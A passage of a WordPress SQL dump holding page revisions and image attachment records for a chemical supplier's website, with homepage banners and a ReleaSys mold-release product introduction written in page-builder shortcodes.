link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 00:28:25', '2016-08-19 00:28:25', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (543, 1, '2016-08-19 00:28:45', '2016-08-19 00:28:45', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 00:28:45', '2016-08-19 00:28:45', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (544, 1, '2016-08-19 00:35:04', '2016-08-19 00:35:04', '', 'chemoursblackwhite', '', 'inherit', 'open', 'closed', '', 'chemoursblackwhite', '', '', '2016-08-19 00:35:04', '2016-08-19 00:35:04', '', 64, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/chemoursblackwhite.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (545, 1, '2016-08-19 00:35:29', '2016-08-19 00:35:29', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="544"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 00:35:29', '2016-08-19 00:35:29', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (546, 1, '2016-08-19 00:37:30', '2016-08-19 00:37:30', '', 'chemoursblackwhite', '', 'inherit', 'open', 'closed', '', 'chemoursblackwhite-2', '', '', '2016-08-19 00:37:30', '2016-08-19 00:37:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/chemoursblackwhite-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (547, 1, '2016-08-19 00:38:35', '2016-08-19 00:38:35', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="546"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 00:38:35', '2016-08-19 00:38:35', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (548, 1, '2016-08-19 00:40:10', '2016-08-19 00:40:10', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 00:40:10', '2016-08-19 00:40:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (549, 1, '2016-08-19 00:49:57', '2016-08-19 00:49:57', '', 'KRYTOX_AUTHORIZED', '', 'inherit', 'open', 'closed', '', 'krytox_authorized', '', '', '2016-08-19 00:49:57', '2016-08-19 00:49:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/KRYTOX_AUTHORIZED.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (554, 1, '2016-08-19 01:53:32', '2016-08-19 01:53:32', '', 'krytoxauth2', '', 'inherit', 'open', 'closed', '', 'krytoxauth2', '', '', '2016-08-19 01:53:32', '2016-08-19 01:53:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytoxauth2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (555, 1, '2016-08-19 01:58:32', '2016-08-19 01:58:32', '', 'krytox_red', '', 'inherit', 'open', 'closed', '', 'krytox_red', '', '', '2016-08-19 02:00:58', '2016-08-19 02:00:58', '', 490, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox_red.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (556, 1, '2016-08-19 02:09:51', '2016-08-19 02:09:51', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<p></p><p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-19 02:09:51', '2016-08-19 02:09:51', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (557, 1, '2016-08-19 02:10:24', '2016-08-19 02:10:24', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent<br>Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<p></p><p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-19 02:10:24', '2016-08-19 02:10:24', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (558, 1, '2016-08-19 02:10:35', '2016-08-19 02:10:35', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent<br>Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson<BR>Exclusive Product\r\n\r\n<p></p><p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-19 02:10:35', '2016-08-19 02:10:35', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (559, 1, '2016-08-19 02:11:31', '2016-08-19 02:11:31', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent<br>Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson<br>Exclusive Product\r\n\r\n<p></p><p></p><p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf" style="success"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-19 02:11:31', '2016-08-19 02:11:31', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (560, 1, '2016-08-19 02:11:55', '2016-08-19 02:11:55', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent<br>Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson<br>Exclusive Product\r\n\r\n<p></p><p></p><p></p><p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release 